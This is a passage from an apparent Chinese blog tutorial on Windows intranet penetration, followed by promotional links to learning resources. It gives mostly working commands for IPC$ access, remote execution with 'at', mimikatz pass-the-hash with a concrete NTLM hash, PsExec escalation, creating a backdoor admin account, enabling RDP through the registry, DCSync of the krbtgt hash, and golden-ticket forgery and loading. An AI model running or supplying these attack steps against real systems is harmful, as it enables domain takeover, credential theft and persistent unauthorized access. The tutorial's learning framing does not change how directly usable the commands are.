内网渗透初探 小白简单学习内网渗透_python写一个内网穿透

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

三、IPC$

1、概念

IPC$(Internet Process Connection)是共享"命名管道"的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。

IPC$的使用条件：
开放了139、445端口；
目标开启IPC$文件共享；
获取用户账号密码。

在内网中，默认就会开启IPC$共享文件服务，默认会将C盘共享出来，也就是说，我们可以通过IPC获取目标C盘的权限。

2、IPC$常用命令

net use	查看当前连接的IPC$
net use * /del	删除IPC$连接
net use \192.168.1.1\ipc$ 密码 /user:域\账号	连接域内IP地址为192.168.1.1的主机
dir \192.168.1.1\c$	列出连接的192.168.1.1的C盘文件
copy c:/12.txt \192.168.1.1\c$\2.txt	复制本地c盘的12.txt文件到192.168.1.1的c盘并保存为2.txt

3、IPC$命令执行

1、通过at命令制定计划进行命令执行。

at \\192.168.1.1 11:15am cmd /c "whoami"

2、通过at命令制定计划进行多层代理的命令执行

at \\192.168.100.1 11:15am cmd /c "net use \\192.168.200.1\ipc$ 密码 /user:账号"
at \\192.168.100.1 11:15am cmd /c "at \\192.168.100.1 11:15am cmd /c "whoami" "

四、Hash传递实战演示

1、首先尝试抓取密码发现获取的全部都是密文。

2、这里虽然没有获取到明文密码，但是获取了域管理员用户的NTLM。

3、提权到SYSTEM权限，执行net user /domain，获取域管所在的主机地址。

4、尝试使用ipc$读取域管的c盘目录，显示拒绝访问。

5、通过mimikatz工具进行Hash传递。

sekurlsa::pth /user:administrator /domain:"ajie.cool" /ntlm:f1de694efa543bb780da59c049541ea3

6、执行完之后会弹出一个命令提示符，执行dir \AD.ajie.cool\c$成功无需账号密码获取了域控机器的c盘的权限，列出了c盘的文件。

7、在通过PTH弹出的命令提示符中通过…/跳转到PsExec.exe文件所在目录，执行命令提权获取一个域控机器的cmd命令提示符。

8、执行ipconfig可以看到是域控所在机器的IP地址，成功拿到域控所在机器的权限。

9、在域控中新建用户并加到管理员组。

10、以新创建的用户远程桌面登录域控，发现无法连接远程桌面服务。

11、通过reg命令查询注册表，查看远程桌面服务发现返回0x01，说明远程桌面服务没有开启。（开启则返回0x00）

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

12、通过拿到的域控的命令提示符来执行修改注册表操作，打开远程服务功能。

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f

13、以新建的hackerend用户远程桌面登录域控。

0x06 黄金票据

一、基础知识

前面了解到在域环境中，域控的账号密码可以登录域内任意一台主机，那么主机是如何检测域控账号密码是否正确的呢？检验账号密码可以有两种方法，询问域控或者设置一个专门检测账号密码是否正确的第三方中心。在域中便使用到了第三方中心来检验输入的账号密码是否相同。这种第三方中心叫KDC密钥分发中心。（以下内容涉及内网的kerboros协议，小弟学业不精，就简单说一下了。）

二、KDC密钥分发中心

KDC（kerberos Distribution Center）密钥分发中心，维护所有账户的名称和Master Key（key的hash code）。

提供：AS认证服务、TGS票据授予服务。

1、AS

授权服务（Authorization Server），对于上面的流程1，提供初始授权认证，用户表明需求并使用密码对请求进行加密，AS用提供的密码对请求进行解密后得到的请求内容，返回给用户一个TGT（票据授权票据 ticket granting tickets）（用一个密码加密）。

2、TGS

用户得到TGT之后使用TGT去访问TGS（票据授权中心Ticket Granting Server），

TGS验证TGT后（使用密钥解密），返回一个Ticket给用户；用户得到Ticket后去访问Server，Server收到Ticket和KDC进行验证，通过后提供服务。

3、票据

在内网渗透中，票据分为白银票据和黄金票据。分别对应域普通用户的票据和域管理员的票据。票据就是Kerberos认证协议的Ticket，因为已经经过了AS和TGS的校验，所以获取了票据之后，可以任意登录目标主机。

在查询域内用户的时候，总会看到一个用户叫krbtgt，如图5-37所示。krbtgt账户其实就是KDC秘钥分发中心用的超管账户。我们拿着krbtgt账户的票据，去访问域内机器，目标主机会认为我们是KDC秘钥分发中心，所以直接给了最高的权限允许我们访问。 一般管理员会修改域控账号的密码，但是很少有管理员会修改Krbtgt的密码。在内网渗透的最后阶段，我们需要通过获取黄金票据进行权限维持，那么下面将介绍如何获取krbtgt账户的黄金票据。

三、实战演示

1、首先通过远程桌面将mimikatz.exe和PsExec.exe上传到域控主机。

2、通过PsExec提权为SYSTEM，然后执行mimikatz，输入命令lsadump::dcsync /user:krbtgt 获取krbtgt的hash值。

3、这里制作黄金票据需要的数据为：

Object Security ID : S-1-5-21-3296092892-1320626564-2720975204Hash NTLM: 31edc56a2302a25a2e9bee5f04abd659

原Object Security ID最后面有个-502是作为标识的，在制作时需要手动删除。

4、退出远程桌面，在攻击机通过mimikatz制作黄金票据。执行命令后会生成一个AD.kiribi文件。

kerberos::golden /admin:administrator /domain:ajie.cool /sid:S-1-5-21-3296092892-1320626564-2720975204 /krbtgt:31edc56a2302a25a2e9bee5f04abd659 /ticket:administrator.kiribi

5、制作完票据之后，先尝试获取域控的c盘的权限发现拒绝访问。

6、通过kerberos::purge清空票据缓存；kerberos::list列出票据显示为空，说明清空了所以票据。

7、通过kerberos::ptt administrator.kiribi加载生成的票据。

8、成功无密码获取域控c盘权限，后面进一步提权与Hash传递处相仿，就不做演示了。

0x07 总结

以上便是我学习的简单地从外网获取shell，经过提权或不提权直接进行内网渗透的一个简单过程，其中涉及一些概念问题没有说的很明白，希望表哥们提点提点。以上仅为个人学习过程，可能知识点过于简单，望理解。

从靠劳力赚钱转变成靠脑力赚钱，想入门黑客的小白肯定想知道如何学好？

👉[[[CSDN大礼包：《黑客&网络安全入门&进阶学习资源》免费分享]]]（安全链接，放心点击）

一、网安学习成长路线图

Python所有方向的技术点做的整理，形成各个领域的知识点汇总，它的用处就在于，你可以按照上面的知识点去找对应的学习资源，保证自己学得较为全面。（全套教程文末领取哈）

二、网安视频合集

观看零基础学习视频，看视频学习是最快捷也是最有效果的方式，跟着视频中老师的思路，从基础到深入，还是很容易入门的。

三、精品网安学习书籍

当我学到一定基础，有自己的理解能力的时候，会去阅读一些前辈整理的书籍或者手写的笔记资料，这些笔记详细记载了他们对一些技术点的理解，这些理解是比较独到，可以学到不一样的思路。

一、Python所有方向的学习路线

Python所有方向的技术点做的整理，形成各个领域的知识点汇总，它的用处就在于，你可以按照下面的知识点去找对应的学习资源，保证自己学得较为全面。

二、Python必备开发工具

工具都帮大家整理好了，安装就可直接上手！

三、最新Python学习笔记

当我学到一定基础，有自己的理解能力的时候，会去阅读一些前辈整理的书籍或者手写的笔记资料，这些笔记详细记载了他们对一些技术点的理解，这些理解是比较独到，可以学到不一样的思路。

四、Python视频合集

观看全面零基础学习视频，看视频学习是最快捷也是最有效果的方式，跟着视频中老师的思路，从基础到深入，还是很容易入门的。

五、实战案例

纸上得来终觉浅，要学会跟着视频一起敲，要动手实操，才能将自己的所学运用到实际当中去，这时候可以搞点实战案例来学习。

六、面试宝典

简历模板

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化学习资料的朋友，可以戳这里无偿获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！